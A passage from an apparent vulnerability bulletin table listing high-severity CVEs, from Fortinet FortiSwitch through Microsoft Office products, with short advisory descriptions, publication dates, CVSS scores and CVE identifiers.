A use of hard-coded cryptographic key in Fortinet FortiSwitch version 7.4.0 and 7.2.0 through 7.2.5 and 7.0.0 through 7.0.7 and 6.4.0 through 6.4.13 and 6.2.0 through 6.2.7 and 6.0.0 through 6.0.7 allows attacker to execute unauthorized code or commands via crafted requests. | 2025-01-14 | 9.8 | CVE-2023-37936 |
| Fortinet--FortiSwitch |
An improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSwitch version 7.4.0 and 7.2.0 through 7.2.5 and 7.0.0 through 7.0.7 and 6.4.0 through 6.4.13 and 6.2.0 through 6.2.7 and 6.0.0 through 6.0.7 allows attacker to execute unauthorized code or commands via the FortiSwitch CLI. | 2025-01-14 | 7.8 | CVE-2023-37937 |
| Fortinet--FortiVoice |
An improper neutralization of special elements used in an sql command ('sql injection') vulnerability [CWE-88] in FortiVoice Entreprise version 7.0.0 through 7.0.1 and before 6.4.8 allows an authenticated attacker to perform a blind sql injection attack via sending crafted HTTP or HTTPS requests | 2025-01-14 | 8.8 | CVE-2023-37931 |
| Fuji Electric--Alpha5 SMART |
Fuji Electric Alpha5 SMART is vulnerable to a stack-based buffer overflow, which may allow an attacker to execute arbitrary code. | 2025-01-17 | 7.8 | CVE-2024-34579 |
| galleryape--Photo Gallery Image Gallery by Ape |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in galleryape Photo Gallery - Image Gallery by Ape allows Reflected XSS.This issue affects Photo Gallery - Image Gallery by Ape: from n/a through 2.2.8. | 2025-01-15 | 7.1 | CVE-2025-22317 |
| Genivia--gSOAP |
In Genivia gSOAP with a specific configuration an unauthenticated remote attacker can generate a high CPU load when forcing to parse an XML having duplicate ID attributes which can lead to a DoS. | 2025-01-15 | 7.5 | CVE-2024-4227 |
| Genkisan--Genki Announcement |
Cross-Site Request Forgery (CSRF) vulnerability in Genkisan Genki Announcement allows Cross Site Request Forgery.This issue affects Genki Announcement: from n/a through 1.4.1. | 2025-01-16 | 7.1 | CVE-2025-23900 |
| getsentry--sentry |
Sentry is a developer-first error tracking and performance monitoring tool. A critical vulnerability was discovered in the SAML SSO implementation of Sentry. It was reported to us via our private bug bounty program. The vulnerability allows an attacker to take over any user account by using a malicious SAML Identity Provider and another organization on the same Sentry instance. The victim email address must be known in order to exploit this vulnerability. The Sentry SaaS fix was deployed on Jan 14, 2025. For self hosted users; if only a single organization is allowed `(SENTRY_SINGLE_ORGANIZATION = True)`, then no action is needed. Otherwise, users should upgrade to version 25.1.0 or higher. There are no known workarounds for this vulnerability. | 2025-01-15 | 9.1 | CVE-2025-22146 |
| git-ecosystem--git-credential-manager |
Git Credential Manager (GCM) is a secure Git credential helper built on .NET that runs on Windows, macOS, and Linux. The Git credential protocol is text-based over standard input/output, and consists of a series of lines of key-value pairs in the format `key=value`. Git's documentation restricts the use of the NUL (`\0`) character and newlines to form part of the keys or values. When Git reads from standard input, it considers both LF and CRLF as newline characters for the credential protocol by virtue of calling `strbuf_getline` that calls to `strbuf_getdelim_strip_crlf`. Git also validates that a newline is not present in the value by checking for the presence of the line-feed character (LF, `\n`), and errors if this is the case. This captures both LF and CRLF-type newlines. Git Credential Manager uses the .NET standard library `StreamReader` class to read the standard input stream line-by-line and parse the `key=value` credential protocol format. The implementation of the `ReadLineAsync` method considers LF, CRLF, and CR as valid line endings. This is means that .NET considers a single CR as a valid newline character, whereas Git does not. This mismatch of newline treatment between Git and GCM means that an attacker can craft a malicious remote URL. When a user clones or otherwise interacts with a malicious repository that requires authentication, the attacker can capture credentials for another Git remote. The attack is also heightened when cloning from repositories with submodules when using the `--recursive` clone option as the user is not able to inspect the submodule remote URLs beforehand. This issue has been patched in version 2.6.1 and all users are advised to upgrade. Users unable to upgrade should only interact with trusted remote repositories, and not clone with `--recursive` to allow inspection of any submodule URLs before cloning those submodules. | 2025-01-14 | 7.4 | CVE-2024-50338 |
| GiveWP--GiveWP |
Deserialization of Untrusted Data vulnerability in GiveWP GiveWP allows Object Injection.This issue affects GiveWP: from n/a through 3.19.3. | 2025-01-13 | 9.8 | CVE-2025-22777 |
| google -- chrome |
Out of bounds read in Metrics in Google Chrome prior to 132.0.6834.83 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2025-01-15 | 8.8 | CVE-2025-0437 |
| Google--Chrome |
Out of bounds memory access in V8 in Google Chrome prior to 132.0.6834.83 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2025-01-15 | 8.8 | CVE-2025-0434 |
| Google--Chrome |
Integer overflow in Skia in Google Chrome prior to 132.0.6834.83 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2025-01-15 | 8.8 | CVE-2025-0436 |
| Google--Chrome |
Stack buffer overflow in Tracing in Google Chrome prior to 132.0.6834.83 allowed a remote attacker to potentially exploit stack corruption via a crafted HTML page. (Chromium security severity: High) | 2025-01-15 | 8.8 | CVE-2025-0438 |
| Google--Chrome |
Insufficient data validation in Extensions in Google Chrome prior to 132.0.6834.83 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform privilege escalation via a crafted HTML page. (Chromium security severity: Medium) | 2025-01-15 | 8.8 | CVE-2025-0443 |
| Google--Chrome |
Inappropriate implementation in Navigation in Google Chrome prior to 132.0.6834.83 allowed a remote attacker to perform privilege escalation via a crafted HTML page. (Chromium security severity: Low) | 2025-01-15 | 8.8 | CVE-2025-0447 |
| Gordon French--Comment-Emailer |
Cross-Site Request Forgery (CSRF) vulnerability in Gordon French Comment-Emailer allows Stored XSS.This issue affects Comment-Emailer: from n/a through 1.0.5. | 2025-01-16 | 7.1 | CVE-2025-23627 |
| grandslambert--Featured Page Widget |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in grandslambert Featured Page Widget allows Reflected XSS.This issue affects Featured Page Widget: from n/a through 2.2. | 2025-01-13 | 7.1 | CVE-2025-22569 |
| Gravity Forms--Gravity Forms |
The Gravity Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'alt' parameter in all versions up to, and including, 2.9.1.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-17 | 7.2 | CVE-2024-13377 |
| GSheetConnector--GSheetConnector for Forminator Forms |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GSheetConnector GSheetConnector for Forminator Forms allows Reflected XSS.This issue affects GSheetConnector for Forminator Forms: from n/a through 1.0.11. | 2025-01-15 | 7.1 | CVE-2025-22752 |
| Harsh--iSpring Embedder |
Cross-Site Request Forgery (CSRF) vulnerability in Harsh iSpring Embedder allows Upload a Web Shell to a Web Server.This issue affects iSpring Embedder: from n/a through 1.0. | 2025-01-16 | 10 | CVE-2025-23922 |
| Hernan Javier Hegykozi--MercadoLibre Integration |
Cross-Site Request Forgery (CSRF) vulnerability in Hernan Javier Hegykozi MercadoLibre Integration allows Stored XSS.This issue affects MercadoLibre Integration: from n/a through 1.1. | 2025-01-16 | 7.1 | CVE-2025-23659 |
| Hewlett Packard Enterprise (HPE)--HPE Aruba Networking AOS |
An authenticated parameter injection vulnerability exists in the web-based management interface of the AOS-8 and AOS-10 Operating Systems. Successful exploitation could allow an authenticated user to leverage parameter injection to overwrite arbitrary system files. | 2025-01-14 | 7.2 | CVE-2025-23051 |
| Hewlett Packard Enterprise (HPE)--HPE Aruba Networking AOS |
Authenticated command injection vulnerability in the command line interface of a network management service. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands as a privileged user on the underlying operating system. | 2025-01-14 | 7.2 | CVE-2025-23052 |
| hirewebxperts -- passwords_manager |
The Passwords Manager plugin for WordPress is vulnerable to SQL Injection via the $wpdb->prefix value in several AJAX fuctions in all versions up to, and including, 1.4.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-01-16 | 7.5 | CVE-2024-12613 |
| hirewebxperts -- passwords_manager |
The Passwords Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'pms_save_setting' and 'post_new_pass' AJAX actions in all versions up to, and including, 1.4.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugins settings and add passwords. | 2025-01-16 | 7.5 | CVE-2024-12614 |
| i3 Verticals--TrueFiling |
TrueFiling is a collaborative, web-based electronic filing system where attorneys, paralegals, court reporters and self-represented filers collect public legal documentation into cases. TrueFiling is an entirely cloud-hosted application. Prior to version 3.1.112.19, TrueFiling trusted some client-controlled identifiers passed in URL requests to retrieve information. Platform users must self-register for an account, and once authenticated, could manipulate those identifiers to gain partial access to case information and the ability to partially change user access to case information. This vulnerability was addressed in version 3.1.112.19 and all instances were updated by 2024-11-08. | 2025-01-17 | 7.3 | CVE-2024-11146 |
| IBM--CICS TX Advanced |
IBM CICS TX Advanced 10.1, 11.1, and Standard 11.1 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. | 2025-01-16 | 7.2 | CVE-2024-41746 |
| IBM--Safer Payments |
IBM Safer Payments 6.4.0.00 through 6.4.2.07, 6.5.0.00 through 6.5.0.05, and 6.6.0.00 through 6.6.0.03 could allow a remote attacker to cause a denial of service due to improper allocation of resources. | 2025-01-18 | 7.5 | CVE-2024-45662 |
| IBM--Sterling Secure Proxy |
IBM Sterling Secure Proxy 6.0.0.0, 6.0.0.1, 6.0.0.2, 6.0.0.3, 6.1.0.0, and 6.2.0.0 could allow an unauthorized attacker to retrieve or alter sensitive information contents due to incorrect permission assignments. | 2025-01-19 | 9.1 | CVE-2024-38337 |
| IBM--Sterling Secure Proxy |
IBM Sterling Secure Proxy 6.0.0.0, 6.0.0.1, 6.0.0.2, 6.0.0.3, 6.1.0.0, and 6.2.0.0 could allow a privileged user to inject commands into the underlying operating system due to improper validation of a specified type of input. | 2025-01-19 | 9.1 | CVE-2024-41783 |
| IBM--TXSeries for Multiplatforms |
IBM TXSeries for Multiplatforms 10.1 is vulnerable to a denial of service, caused by improper enforcement of the timeout on individual read operations. By conducting a slowloris-type attacks, a remote attacker could exploit this vulnerability to cause a denial of service. | 2025-01-19 | 7.5 | CVE-2024-41742 |
| IBM--TXSeries for Multiplatforms |
IBM TXSeries for Multiplatforms 10.1 could allow a remote attacker to cause a denial of service using persistent connections due to improper allocation of resources. | 2025-01-19 | 7.5 | CVE-2024-41743 |
| IBM--Voice Gateway |
IBM ICP - Voice Gateway 1.0.2, 1.0.2.4, 1.0.3, 1.0.4, 1.0.5, 1.0.6. 1.0.7, 1.0.7.1, and 1.0.8 could allow remote attacker to send specially crafted XML statements, which would allow them to attacker to view or modify information in the XML document. | 2025-01-18 | 8.1 | CVE-2024-47113 |
| Igor Sazonov--Len Slider |
Cross-Site Request Forgery (CSRF) vulnerability in Igor Sazonov Len Slider allows Reflected XSS.This issue affects Len Slider: from n/a through 2.0.11. | 2025-01-16 | 7.1 | CVE-2025-23810 |
| Imagination Technologies--Graphics DDK |
Software installed and run as a non-privileged user may conduct improper GPU system calls resulting in platform instability and reboots. | 2025-01-13 | 8.8 | CVE-2024-47897 |
| Imagination Technologies--Graphics DDK |
Kernel software installed and running inside a Guest VM may post improper commands to the GPU Firmware to read data outside the Guest's virtualised GPU memory. | 2025-01-13 | 7.1 | CVE-2024-47894 |
| Imagination Technologies--Graphics DDK |
Kernel software installed and running inside a Guest VM may post improper commands to the GPU Firmware to read data outside the Guest's virtualised GPU memory. | 2025-01-13 | 7.1 | CVE-2024-47895 |
| Imagination Technologies--Graphics DDK |
Kernel software installed and running inside a Guest VM may post improper commands to the GPU Firmware to subvert reconstruction activities to trigger a write of data outside the Guest's virtualised GPU memory. | 2025-01-13 | 7.8 | CVE-2024-52938 |
| Infosoft Consultant--Order Audit Log for WooCommerce |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Infosoft Consultant Order Audit Log for WooCommerce allows Reflected XSS.This issue affects Order Audit Log for WooCommerce: from n/a through 2.0. | 2025-01-13 | 7.1 | CVE-2025-22337 |
| Intuitive Design--GDReseller |
Cross-Site Request Forgery (CSRF) vulnerability in Intuitive Design GDReseller allows Stored XSS.This issue affects GDReseller: from n/a through 1.6. | 2025-01-16 | 7.1 | CVE-2025-23567 |
| Invoice Ninja--Invoice Ninja |
Invoice Ninja is vulnerable to authenticated Server-Side Request Forgery (SSRF) allowing for arbitrary file read and network resource requests as the application user. This issue affects Invoice Ninja: from 5.8.56 through 5.11.23. | 2025-01-14 | 7.7 | CVE-2025-0474 |
| isnowfy--my-related-posts |
Cross-Site Request Forgery (CSRF) vulnerability in isnowfy my-related-posts allows Stored XSS.This issue affects my-related-posts: from n/a through 1.1. | 2025-01-16 | 7.1 | CVE-2025-23476 |
| ITMOOTI--Theme My Ontraport Smartform |
Cross-Site Request Forgery (CSRF) vulnerability in ITMOOTI Theme My Ontraport Smartform allows Stored XSS.This issue affects Theme My Ontraport Smartform: from n/a through 1.2.11. | 2025-01-16 | 7.1 | CVE-2025-23717 |
| ivanti -- avalanche |
Path Traversal in Ivanti Avalanche before version 6.4.7 allows a remote unauthenticated attacker to bypass authentication. | 2025-01-14 | 7.3 | CVE-2024-13179 |
| ivanti -- avalanche |
Path Traversal in Ivanti Avalanche before version 6.4.7 allows a remote unauthenticated attacker to leak sensitive information. This CVE addresses incomplete fixes from CVE-2024-47011. | 2025-01-14 | 7.5 | CVE-2024-13180 |
| ivanti -- avalanche |
Path Traversal in Ivanti Avalanche before version 6.4.7 allows a remote unauthenticated attacker to bypass authentication. This CVE addresses incomplete fixes from CVE-2024-47010. | 2025-01-14 | 7.3 | CVE-2024-13181 |
| Ivanti--Application Control Engine |
A race condition in Ivanti Application Control Engine before version 10.14.4.0 allows a local authenticated attacker to bypass the application blocking functionality. | 2025-01-14 | 7.8 | CVE-2024-10630 |
| Ivanti--Endpoint Manager |
Absolute path traversal in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote unauthenticated attacker to leak sensitive information. | 2025-01-14 | 9.8 | CVE-2024-10811 |
| Ivanti--Endpoint Manager |
Absolute path traversal in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote unauthenticated attacker to leak sensitive information. | 2025-01-14 | 9.8 | CVE-2024-13159 |
| Ivanti--Endpoint Manager |
Absolute path traversal in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote unauthenticated attacker to leak sensitive information. | 2025-01-14 | 9.8 | CVE-2024-13160 |
| Ivanti--Endpoint Manager |
Absolute path traversal in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote unauthenticated attacker to leak sensitive information. | 2025-01-14 | 9.8 | CVE-2024-13161 |
| Ivanti--Endpoint Manager |
An unbounded resource search path in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote authenticated attacker with admin privileges to achieve remote code execution. | 2025-01-14 | 7.2 | CVE-2024-13158 |
| Ivanti--Endpoint Manager |
SQL injection in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote authenticated attacker with admin privileges to achieve remote code execution. This CVE addresses incomplete fixes from CVE-2024-32848. | 2025-01-14 | 7.2 | CVE-2024-13162 |
| Ivanti--Endpoint Manager |
Deserialization of untrusted data in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote unauthenticated attacker to achieve remote code execution. Local user interaction is required. | 2025-01-14 | 7.8 | CVE-2024-13163 |
| Ivanti--Endpoint Manager |
An uninitialized resource in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a local authenticated attacker to escalate their privileges. | 2025-01-14 | 7.8 | CVE-2024-13164 |
| Ivanti--Endpoint Manager |
An out-of-bounds write in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote unauthenticated attacker to cause a denial of service. | 2025-01-14 | 7.5 | CVE-2024-13165 |
| Ivanti--Endpoint Manager |
An out-of-bounds write in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote unauthenticated attacker to cause a denial of service. | 2025-01-14 | 7.5 | CVE-2024-13166 |
| Ivanti--Endpoint Manager |
An out-of-bounds write in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote unauthenticated attacker to cause a denial of service. | 2025-01-14 | 7.5 | CVE-2024-13167 |
| Ivanti--Endpoint Manager |
An out-of-bounds write in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote unauthenticated attacker to cause a denial of service. | 2025-01-14 | 7.5 | CVE-2024-13168 |
| Ivanti--Endpoint Manager |
An out-of-bounds read in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a local authenticated attacker to escalate their privileges. | 2025-01-14 | 7.8 | CVE-2024-13169 |
| Ivanti--Endpoint Manager |
An out-of-bounds write in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote unauthenticated attacker to cause a denial of service. | 2025-01-14 | 7.5 | CVE-2024-13170 |
| Ivanti--Endpoint Manager |
Insufficient filename validation in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote unauthenticated attacker to achieve remote code execution. Local user interaction is required. | 2025-01-14 | 7.8 | CVE-2024-13171 |
| Ivanti--Endpoint Manager |
Improper signature verification in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote unauthenticated attacker to achieve remote code execution. Local user interaction is required. | 2025-01-14 | 7.8 | CVE-2024-13172 |
| Ivn R. Delgado Martnez--WP Custom Google Search |
Cross-Site Request Forgery (CSRF) vulnerability in Iván R. Delgado MartÃnez WP Custom Google Search allows Stored XSS.This issue affects WP Custom Google Search: from n/a through 1.0. | 2025-01-16 | 7.1 | CVE-2025-23698 |
| Ivo Brett ApplyMetrics--Apply with LinkedIn buttons |
Cross-Site Request Forgery (CSRF) vulnerability in Ivo Brett - ApplyMetrics Apply with LinkedIn buttons allows Stored XSS.This issue affects Apply with LinkedIn buttons: from n/a through 2.3. | 2025-01-16 | 7.1 | CVE-2025-23898 |
| James Bavington--WP Headmaster |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in James Bavington WP Headmaster allows Reflected XSS.This issue affects WP Headmaster: from n/a through 0.3. | 2025-01-15 | 7.1 | CVE-2025-22755 |
| Jay Carter--WP Bulletin Board |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jay Carter WP Bulletin Board allows Reflected XSS.This issue affects WP Bulletin Board: from n/a through 1.1.4. | 2025-01-15 | 7.1 | CVE-2025-22776 |
| Johan Strm--Background Control |
Cross-Site Request Forgery (CSRF) vulnerability in Johan Ström Background Control allows Path Traversal.This issue affects Background Control: from n/a through 1.0.5. | 2025-01-15 | 8.6 | CVE-2025-22784 |
| Joshua Wieczorek--Bible Embed |
Cross-Site Request Forgery (CSRF) vulnerability in Joshua Wieczorek Bible Embed allows Stored XSS.This issue affects Bible Embed: from n/a through 0.0.4. | 2025-01-16 | 7.1 | CVE-2025-23513 |
| jprintf--CNZZ&51LA for WordPress |
Cross-Site Request Forgery (CSRF) vulnerability in jprintf CNZZ&51LA for WordPress allows Cross Site Request Forgery.This issue affects CNZZ&51LA for WordPress: from n/a through 1.0.1. | 2025-01-16 | 7.1 | CVE-2025-23823 |
| Kapost--Kapost |
Cross-Site Request Forgery (CSRF) vulnerability in Kapost Kapost allows Stored XSS.This issue affects Kapost: from n/a through 2.2.9. | 2025-01-16 | 7.1 | CVE-2025-23712 |
| Kathleen Malone--Find Your Reps |
Cross-Site Request Forgery (CSRF) vulnerability in Kathleen Malone Find Your Reps allows Stored XSS.This issue affects Find Your Reps: from n/a through 1.2. | 2025-01-16 | 7.1 | CVE-2025-23557 |
| Katz Web Services, Inc.--Debt Calculator |
Cross-Site Request Forgery (CSRF) vulnerability in Katz Web Services, Inc. Debt Calculator allows Cross Site Request Forgery.This issue affects Debt Calculator: from n/a through 1.0.1. | 2025-01-16 | 7.1 | CVE-2025-23861 |
| Kelvin Ng--Shortcode in Comment |
Cross-Site Request Forgery (CSRF) vulnerability in Kelvin Ng Shortcode in Comment allows Stored XSS.This issue affects Shortcode in Comment: from n/a through 1.1.1. | 2025-01-16 | 7.1 | CVE-2025-23569 |
| Kreg Steppe--Auphonic Importer |
Cross-Site Request Forgery (CSRF) vulnerability in Kreg Steppe Auphonic Importer allows Stored XSS.This issue affects Auphonic Importer: from n/a through 1.5.1. | 2025-01-16 | 7.1 | CVE-2025-23649 |
| Laxman Thapa--Content Security Policy Pro |
Cross-Site Request Forgery (CSRF) vulnerability in Laxman Thapa Content Security Policy Pro allows Cross Site Request Forgery.This issue affects Content Security Policy Pro: from n/a through 1.3.5. | 2025-01-16 | 7.1 | CVE-2025-23820 |
| Lexmark--Printer Firmware |
A buffer overflow vulnerability has been identified in the Internet Printing Protocol (IPP) in various Lexmark devices. The vulnerability can be leveraged by an attacker to execute arbitrary code. | 2025-01-18 | 8.8 | CVE-2023-50739 |
| Lijit Networks Inc. and Crowd Favorite--Lijit Search |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Lijit Networks Inc. and Crowd Favorite Lijit Search allows Reflected XSS.This issue affects Lijit Search: from n/a through 1.1. | 2025-01-15 | 7.1 | CVE-2025-22778 |
| linickx--root Cookie |
Cross-Site Request Forgery (CSRF) vulnerability in linickx root Cookie allows Cross Site Request Forgery. This issue affects root Cookie: from n/a through 1.6. | 2025-01-16 | 7.1 | CVE-2025-23815 |
| madalinungureanu--Paid Membership Subscriptions Effortless Memberships, Recurring Payments & Content Restriction |
The Paid Membership Subscriptions - Effortless Memberships, Recurring Payments & Content Restriction plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 2.13.7. This is due to the pms_pb_payment_redirect_link function using the user-controlled value supplied via the 'pms_payment_id' parameter to authenticate users without any further identity validation. This makes it possible for unauthenticated attackers with knowledge of a valid payment ID to log in as any user who has made a purchase on the targeted site. | 2025-01-14 | 9.8 | CVE-2024-12919 |
| Mahadir Ahmad--MHR-Custom-Anti-Copy |
Cross-Site Request Forgery (CSRF) vulnerability in Mahadir Ahmad MHR-Custom-Anti-Copy allows Stored XSS.This issue affects MHR-Custom-Anti-Copy: from n/a through 2.0. | 2025-01-16 | 7.1 | CVE-2025-23817 |
| Mahdi Khaksar--mybb Last Topics |
Cross-Site Request Forgery (CSRF) vulnerability in Mahdi Khaksar mybb Last Topics allows Stored XSS.This issue affects mybb Last Topics: from n/a through 1.0. | 2025-01-16 | 7.1 | CVE-2025-23749 |
| Mahesh Bisen--Contact Form 7 CCAvenue Add-on |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mahesh Bisen Contact Form 7 - CCAvenue Add-on allows Reflected XSS.This issue affects Contact Form 7 - CCAvenue Add-on: from n/a through 1.0. | 2025-01-16 | 7.1 | CVE-2025-23623 |
| Marcus Downing--Site PIN |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Marcus Downing Site PIN allows Reflected XSS.This issue affects Site PIN: from n/a through 1.3. | 2025-01-13 | 7.1 | CVE-2025-22576 |
| Martijn Scheybeler--Social Analytics |
Cross-Site Request Forgery (CSRF) vulnerability in Martijn Scheybeler Social Analytics allows Stored XSS.This issue affects Social Analytics: from n/a through 0.2. | 2025-01-16 | 7.1 | CVE-2025-23743 |
| MarvinLabs--WP PT-Viewer |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MarvinLabs WP PT-Viewer allows Reflected XSS.This issue affects WP PT-Viewer: from n/a through 2.0.2. | 2025-01-16 | 7.1 | CVE-2025-23438 |
| Masoud Amini--Zarinpal Paid Download |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Masoud Amini Zarinpal Paid Download allows Reflected XSS.This issue affects Zarinpal Paid Download: from n/a through 2.3. | 2025-01-15 | 7.1 | CVE-2025-22766 |
| mastersoftwaresolutions--WP VTiger Synchronization |
Cross-Site Request Forgery (CSRF) vulnerability in mastersoftwaresolutions WP VTiger Synchronization allows Stored XSS.This issue affects WP VTiger Synchronization: from n/a through 1.1.1. | 2025-01-16 | 7.1 | CVE-2025-23455 |
| matias s--Shockingly Big IE6 Warning |
Cross-Site Request Forgery (CSRF) vulnerability in matias s Shockingly Big IE6 Warning allows Stored XSS.This issue affects Shockingly Big IE6 Warning: from n/a through 1.6.3. | 2025-01-16 | 7.1 | CVE-2025-23442 |
| Matt Gibbs--Admin Cleanup |
Cross-Site Request Forgery (CSRF) vulnerability in Matt Gibbs Admin Cleanup allows Stored XSS.This issue affects Admin Cleanup: from n/a through 1.0.2. | 2025-01-16 | 7.1 | CVE-2025-23832 |
| Matt van Andel--Custom List Table Example |
Cross-Site Request Forgery (CSRF) vulnerability in Matt van Andel Custom List Table Example allows Reflected XSS.This issue affects Custom List Table Example: from n/a through 1.4.1. | 2025-01-16 | 7.1 | CVE-2025-23808 |
| Mayur Sojitra--Flying Twitter Birds |
Cross-Site Request Forgery (CSRF) vulnerability in Mayur Sojitra Flying Twitter Birds allows Stored XSS.This issue affects Flying Twitter Birds: from n/a through 1.8. | 2025-01-16 | 7.1 | CVE-2025-23710 |
| microsoft -- 365_apps |
Microsoft Excel Remote Code Execution Vulnerability | 2025-01-14 | 8.4 | CVE-2025-21362 |
| microsoft -- 365_apps |
Microsoft Word Remote Code Execution Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21363 |
| microsoft -- 365_apps |
Microsoft Excel Security Feature Bypass Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21364 |
| microsoft -- 365_apps |
Microsoft Office Remote Code Execution Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21365 |
| microsoft -- 365_apps |
Microsoft Access Remote Code Execution Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21366 |
| microsoft -- 365_apps |
Microsoft Access Remote Code Execution Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21395 |
| microsoft -- autoupdate |
Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21360 |
| microsoft -- office |
Microsoft Outlook Remote Code Execution Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21361 |
| microsoft -- visual_studio_2022 |
Visual Studio Elevation of Privilege Vulnerability | 2025-01-14 | 7.3 | CVE-2025-21405 |
| microsoft -- windows_10_1507 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21409 |
| microsoft -- windows_10_1507 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21411 |
| microsoft -- windows_10_1507 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21413 |
| microsoft -- windows_10_1507 |
Windows Telephony Service Remote Code Execution Vulnerability | 2025-01-14 | 8.8 | CVE-2025-21417 |
| microsoft -- windows_10_1507 |
Windows CSC Service Elevation of Privilege Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21378 |
| microsoft -- windows_10_1507 |
Windows upnphost.dll Denial of Service Vulnerability | 2025-01-14 | 7.5 | CVE-2025-21389 |
| microsoft -- windows_10_1809 |
Windows Graphics Component Elevation of Privilege Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21382 |
| microsoft -- windows_10_21h2 |
Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21333 |
| microsoft -- windows_10_21h2 |
Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21334 |
| microsoft -- windows_10_21h2 |
Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21335 |
| microsoft -- windows_11_22h2 |
Windows Virtualization-Based Security (VBS) Enclave Elevation of Privilege Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21370 |
| microsoft -- windows_11_24h2 |
Microsoft Brokering File System Elevation of Privilege Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21372 |
| Microsoft--.NET 8.0 |
.NET Elevation of Privilege Vulnerability | 2025-01-14 | 7.3 | CVE-2025-21173 |
| Microsoft--.NET 9.0 |
.NET Remote Code Execution Vulnerability | 2025-01-14 | 7.5 | CVE-2025-21171 |
| Microsoft--Microsoft Edge Update Setup |
Microsoft Edge (Chromium-based) Update Elevation of Privilege Vulnerability | 2025-01-17 | 7.4 | CVE-2025-21399 |
| Microsoft--Microsoft Office 2019 |
Microsoft Access Remote Code Execution Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21186 |
| Microsoft--Microsoft Office 2019 |
Microsoft Office Visio Remote Code Execution Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21345 |
| Microsoft--Microsoft Office 2019 |
Microsoft Office Security Feature Bypass Vulnerability | 2025-01-14 | 7.1 | CVE-2025-21346 |
| Microsoft--Microsoft Office 2019 |
Microsoft Office Visio Remote Code Execution Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21356 |
| Microsoft--Microsoft Office LTSC for Mac 2021 |
Microsoft Office OneNote Remote Code Execution Vulnerability | 2025-01-14 | 7.8 | CVE-2025-21402 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 |
